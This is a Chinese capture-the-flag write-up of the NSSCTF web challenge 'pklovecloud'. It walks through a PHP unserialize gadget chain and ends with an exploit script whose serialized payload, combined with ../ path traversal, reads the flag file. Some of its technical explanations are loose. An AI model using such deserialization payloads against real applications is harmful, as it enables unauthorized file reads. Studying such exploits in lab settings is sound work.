NSSCTF-WEB-pklovecloud

目录

前言

正文

思路

尝试

结尾

---

前言

许久未见,甚是想念.

今天来解一道有意思的序列化题

---

正文

思路

<?php
include 'flag.php';
class pkshow
{function echo_name(){return "Pk very safe^.^";}
}class acp
{protected $cinder;public $neutron;public $nova;function __construct(){$this->cinder = new pkshow;}function __toString(){if (isset($this->cinder))return $this->cinder->echo_name();}
}class ace
{public $filename;public $openstack;public $docker;function echo_name(){$this->openstack = unserialize($this->docker);$this->openstack->neutron = $heat;if($this->openstack->neutron === $this->openstack->nova){$file = "./{$this->filename}";if (file_get_contents($file)){return file_get_contents($file);}else{return "keystone lost~";}}}
}if (isset($_GET['pks']))
{$logData = unserialize($_GET['pks']);echo $logData;
}
else
{highlight_file(__file__);
}

序列化,首要的肯定是找哪里可以执行指令或者查看flag

首先我们一开始就看见了这个

include 'flag.php';

当然光看这个没有什么意义

除此之外

function echo_name(){$this->openstack = unserialize($this->docker);//这里做了一次反序列化$this->openstack->neutron = $heat;//$heat应该是flag.php的东西if($this->openstack->neutron === $this->openstack->nova)//===,数组绕过?{$file = "./{$this->filename}";if (file_get_contents($file)){return file_get_contents($file);}else{return "keystone lost~";}}}

这样,我们就明白了,所以$filename=flag.php;

想要执行echo_name,需要看看哪里可以调用

class acp
{protected $cinder;public $neutron;public $nova;function __construct(){$this->cinder = new pkshow;}function __toString(){if (isset($this->cinder))return $this->cinder->echo_name();//就是这里了}
}

但是,echo_name不止一处

class pkshow
{function echo_name(){return "Pk very safe^.^";}
}

我们需要调用__toString魔术方法

__toString()会在类被当作字符串调用的时候自动触发，比如说echo一个类

所以我们还需要查看哪里可以调用__toString

if (isset($_GET['pks']))
{$logData = unserialize($_GET['pks']);echo $logData;
}

我们可以先生成一个序列化,从而成功执行并调用toString()

这个时候,我们可以初步构造一个,然后慢慢修改,因为当题量大的时候,我们很难一次性就理清所有思路然后成功拿到flag

那就先随便写一个

<?php
class pkshow
{function echo_name(){return "Pk very safe^.^";}
}
class acp{protected $cinder;public $neutron;public $nova;function __construct(){$this->cinder=new pkshow;}}class ace//这里原封不动抄下来,因为如果成功调用ace,也会因为ace的过滤回显keystone lost~
{public $filename;public $openstack;public $docker;function echo_name(){$this->openstack = unserialize($this->docker);$this->openstack->neutron = $heat;if($this->openstack->neutron === $this->openstack->nova){$file = "./{$this->filename}";if (file_get_contents($file)){return file_get_contents($file);}else{return "keystone lost~";}}}
}$a=new acp();
echo urlencode(serialize($a));

原因是因为__construct事先定义了new pkshow,所以接下来我们需要进行修改

 function __construct(){$this->cinder = new ace;}

这个应该不难理解,当cinder修改为new ace,下面的toString就将ace实例化为字符串进行调用,又由于ace内部的过滤,所以成功输出了keystone lost~

好的,这是第一步,我们成功使toString执行ace的echo_name,接下来就需要修改ace内部函数获取flag

首先,从开头我们就知道,$filename=flag.php;然后我们来看看ehco_name写了什么

 function echo_name(){$this->openstack = unserialize($this->docker);$this->openstack->neutron = $heat;if($this->openstack->neutron === $this->openstack->nova){$file = "./{$this->filename}";if (file_get_contents($file)){return file_get_contents($file);}else{return "keystone lost~";}}}

关键还是这里的强比较,由此联想数组绕过

关于数组绕过,可以详细看这位师傅的文章

浅谈CTF中各种花式绕过的小trick_ctf 字符串绕过-CSDN博客

对于这种没有丝毫过滤,且具有一点条件的玩法(docker被反序列化),直接定义一个null即可实现相等

一般来说,我们使用a[]=1&b[]=2来绕过,这样实际上a=null,b=null.因为a[]b[]实际是一个空数组

这里的话,我们直接让docker=null即可,这样因为 $this->openstack->neutron就会让neutron=null

那么,接下来

---

尝试

EXP:

<?php
class acp{protected $cinder;public $neutron;public $nova;function __construct(){$this->cinder=new ace;}}class ace
{public $filename='flag.php';public $openstack;public $docker=null;
}$a=new acp();
echo urlencode(serialize($a));

由于本人比较喜欢极简,所以删除了不必要的代码

好的,我们继续

不在当前目录下

../以后成功拿到flag

成功

---

结尾

我也没想到在七月开头的第二天,就已经实现了1w访问量的成就

这对于一位小白代学生来说,是一件值得自豪的事情

也希望未来能够带来更高质量的文章

最后,求赞求关注

感谢!!!!!!!!!!!!!!!!!!!!

---

作者的其他文章

BugKu-WEB-sodirty_bugku sodirty-CSDN博客

攻防世界-WEB-WEIPHP(记一次有趣的代码审计)_攻防世界weiphp-CSDN博客

攻防世界-WEB-catcat-new_攻防世界catcat-new-CSDN博客

BugKu-WEB-unserialize-Noteasy_bugku unserialize-noteasy-CSDN博客